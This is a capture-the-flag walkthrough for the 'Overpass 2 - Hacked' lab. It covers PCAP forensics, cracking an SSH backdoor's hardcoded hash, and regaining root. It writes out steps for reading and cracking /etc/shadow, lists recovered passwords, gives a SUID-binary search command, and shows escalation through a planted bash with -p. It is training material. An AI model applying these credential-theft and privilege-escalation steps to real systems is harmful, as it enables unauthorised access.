Overpass 2 - Hacked

Tasks:

  1. Forensics - Analyse the PCAP:

    1. Download and open pcap file in wireshark
    2. Follow up http stream and answer questions regarding url of shell upload and payload used.
    3. Follow up tcp stream to get commands used by attacker and answer related questions.

    4. From commands you can see attacker logged in as james user with whenevernoteartinstant

      password.

    5. Attacker then used ssh-backdoor to establish persistence.
    6. From tcp stream you can see attacker used cat /etc/shadow ,copy the username and password hash from it and crack it using john the ripper and fasttrack wordlist and complete this task.

  2. Research - Analyse the code:

    1. Go to ssh-backdoor and analyze the code in main.go , it has hardcoded default hash and salt.
    2. While analyzing PCAP file , following tcp stream we came to know that attacker used ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed to establish backdoor and run it as service in port 2222.
    3. Use the above hash and hardcoded salt from main.go and crack it using hashcat to obtain ssh backdoor password.(sha512 hash with salt mode) - november16

  1. Attack - Get back in! :

    1. Login as james using ssh on port 2222 with the password obtained above.
    2. cat /home/james/user.txt and submit user flag.
    3. Search for suid binaries using find / -perm -u=s -type f 2>/dev/null , .suid_bash looks weird from the list.
    4. .suid_bash is bash binary , execute it with -p flag to get root.
    5. cat /root/root.txt and submit root flag !!!

References:

  1. Suidbash - CVE-2019-18276
  2. GTFOBins

results matching ""

    No results matching ""